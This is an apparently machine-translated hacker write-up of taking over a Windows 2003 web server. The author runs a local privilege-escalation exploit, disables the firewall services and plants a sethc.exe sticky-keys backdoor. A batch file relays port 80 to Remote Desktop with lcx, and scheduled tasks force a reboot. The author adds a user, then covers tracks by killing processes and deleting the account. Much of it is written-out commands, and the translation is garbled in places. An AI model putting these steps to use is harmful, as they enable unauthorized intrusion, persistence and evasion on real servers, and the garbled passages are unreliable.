Break through ACL table Filtering for Elevation of Privilege

One day, I got a website permission from a friend and asked me to raise the permission. After reading the information, drive C and drive d have the read-only permission. Drive C: Documents and SettingsAll UsersDocuments can be written. No FTP software or database is installed. Wscript. shell is not disabled, and the terminal port is changed to 45678. I tried to connect port 45678 from the Internet, but LCX could not be exported. I thought it was a WINDOWS Firewall or IPSEC. However, let's get the system permission for the firewall.
Later, this should be the patch of ms08067, upload ms10048.exe to the C: Documents and SettingsAll UsersDocuments directory, run ms10048 Whoami, return nt authoritysystem, for system permissions. Next, turn off the firewall and execute net stop yyagent and net stop sharedaccess. It is found that port 45678 still cannot be connected, so it is very depressing that ping the Internet IP address is not available. Run tracert 220.181.6.175 (220.181.6.175 is Baidu's IP address) to return
1 ms <1 ms <1 203.171.236.1
2 *** Request timed out.
3 *** Request timed out.

The packet is discarded after it passes through the router.
It is preliminarily determined that the ACL table is set for the vro.
After scanning the target server, only port 80 is enabled, and the operating system of the server is WINDOWS 2003. Port multiplexing does not work on port 2003. It seems that you have to stop IIS and then switch port 45678 to port 80.
In the c: windows Directory, write a 1.bat
Content is
Copy c: windowssystem32cmd.exe c: windowssystem32sethc.exe/y/* replace sethc.exe. After logging on to the terminal, press Shift 5 to open the CMD window */
Net stop w3svc
Lcx.exe-tran 80 127.0.0.1 45678
Net start w3svc/* to start IIS when lcx crashes unexpectedly. */
However, you must note that this 1.batchcompute cannot run with ms10048.exe directly. Because the iisprogress is the parent process of ms10048.exe, ms10048.exe automatically exits after iis, so it does not run the subsequent code.
Run time/t to get the server time. Ms10048.exe at 20:25 c: windows1.bat allows the server to run 1.bat at 20:25 to run another ms10048.exe at 20:40 shutdown-r to restart the server at 20:40.
After one or two minutes, connect to port 80 of the server by using the Remote Desktop. Press SHIFT without time 5 to bring up the CMD window, and add the user to log on successfully. After login, run at delete y to delete the added scheduled restart task.
What should I do next.
You can directly restart the server when you exit, but this is not a good case. Open a cmd window and run query user to find your user ID. My user ID is 2. Then, in the CMD window, enter taskkill/IM lcx.exe/F & logoff 2 & net user 410502/del & net start w3svc. This command indicates that lcx.exe logs out of my users, deletes my users, and then start IIS.

The Elevation of Privilege ends successfully.

By not losing memories